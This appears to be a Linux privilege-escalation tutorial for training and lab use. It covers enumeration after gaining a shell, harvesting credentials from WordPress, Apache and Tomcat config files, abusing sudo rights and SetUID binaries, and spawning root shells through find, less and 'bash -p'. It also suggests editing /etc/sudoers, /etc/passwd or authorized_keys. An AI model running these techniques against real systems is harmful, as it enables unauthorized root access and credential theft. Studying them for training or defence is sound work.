You just got shell access to a server. Let start by an exhaustive inventory of what is accessible to your account.

• Identify the OS, its version, the missing security patches
• List available tools: netcat, python, perl...
• Read all config, temporary, backup files to find login/password.
  
• Use the possible sudo rights of the account.
  
• Find commands with SetUID bit.
  
• Find a process running in the background with root rights and modify its inputs.
  
• Find a kernel exploit. This last option, radical because it can crash the machine, is very efficient on old servers...

On your first servers, it is preferable to make these enumerations by launching the commands manually, so you can appropriate the options and outputs. Once comfortable, and knowing what you are looking for, feel free to use scripts that do these enumerations for you.

Find .txt or .cfg files, owned by other accounts, and readable.

find /home -readable -type f  \( -iname \*.txt -o -iname \*.cfg \) 2>/dev/null
find /home -E . -regex '.*\.(txt|cfg)' 2>/dev/null

Wordpress config file is:

wp-config.php

Let find it:

find /var -name wp-config.php 2>/dev/null

This config file contains login/password used to connect to the blog database. By dumping the database, it's thus possible to get wordpress user's login and password hashes.

Apache config file name may be :

httpd.conf
apache2.conf

On le trouve généralement dans un des répertoires:

/etc/apache2/httpd.conf
/etc/apache2/apache2.conf
/etc/httpd/httpd.conf
/etc/httpd/conf/httpd.conf

Tomcat config file is named:

server.xml

User's accounts can be found in :

tomcat-users.xml

Thos files are usually found in:

TOMCAT-HOME/conf/
/usr/local/tomcat/conf/

Sudo is used to run commands as another user.

To know the sudo rights of your account, you have to run the command sudo -l. Sometimes you are asked to enter your password.

sudo -l
The user1 can use the following commands on target-host:
    (ALL) NOPASSWD: /usr/bin/find
    user2 NOPASSWD: /usr/bin/python3 /home/user2/run.py

The first entry is: (ALL) NOPASSWD: /usr/bin/find
It is possible to run the /usr/bin/find command as any server user, especially root.

sudo /usr/bin/find  

Second entry is: user2 NOPASSWD: /usr/bin/python3 /home/user2/run.py
Here it is possible to run the command '/usr/bin/python3 /home/user2/run.py' as user2.
For this we use the 'sudo' command with the '-u user22' flag

sudo -u user2 /usr/bin/python3 /home/user2/run.py 

If the NOPASSWD option is set, you do not have to enter any passwords. Otherwise, the sudo command asks for the password of the current account. If you are logged in via a webshell, or an ssh connection with private key, you will have to figure out the password.

Identify processes with a setUID bit

find / -perm -4000 -exec ls -al {} \; 2>/dev/null

What to do with a binary having a setUID bit ?

- Run a shell
- Read a flag
- Copy a file
- Add an entry in a file : /etc/sudoers, /etc/passwd, ~/.ssh/authorized_keys
- ...

Many processes allow to launch a shell. Perfect with sudo or a setUID bit.

- find
- nmap
- vi
- less
- awk
- tee
...

Reference: https://gtfobins.github.io/

Less is used to read files. Press q to exit.

./less flag.txt

To open a shell, open a file, then !/bin/sh

./less fichier
!/bin/sh

Launched thanks sudo or with SUID bit set, bash drops its privileges. To keep root id, use -p option.

bash -p

To open a shell, find a known file then launch the command: /bin/sh.

sudo /usr/bin/find . -name readme.txt -exec /bin/sh \;
./find . -name readme.txt -exec /bin/sh \;